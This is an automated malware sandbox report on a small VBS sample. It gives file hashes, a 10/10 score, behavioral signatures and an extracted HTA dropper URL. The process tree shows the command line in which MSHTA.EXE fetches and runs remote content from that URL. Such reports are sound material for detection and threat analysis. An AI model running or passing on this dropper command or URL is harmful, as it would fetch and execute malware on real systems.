Analysis
-
max time kernel
44s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
09-08-2022 18:59
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220715-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220721-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
7fa6c86604b4b5706beac109127af386
-
SHA1
aeac233400b02928f3a025a740bcfd6e2f85cd8a
-
SHA256
04d8d89df7a3ebe9d24b4635b6f4760e81465d672cb9f010e020b336b2d811ec
-
SHA512
e79fe1be4f96e06da8f60e7bb486e854bbf66509c637f08734771cc6a26a8051a281f8e484145252cd2e90d7196175761ad14f4cf00122ae9431a330ba189330
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tradeguru.com.pk/enc.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEdescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1248 1836 MSHTA.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
MSHTA.EXEflow pid process 4 1248 MSHTA.EXE 5 1248 MSHTA.EXE 6 1248 MSHTA.EXE 7 1248 MSHTA.EXE -
Processes:
MSHTA.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main MSHTA.EXE
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"1⤵PID:1672
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1248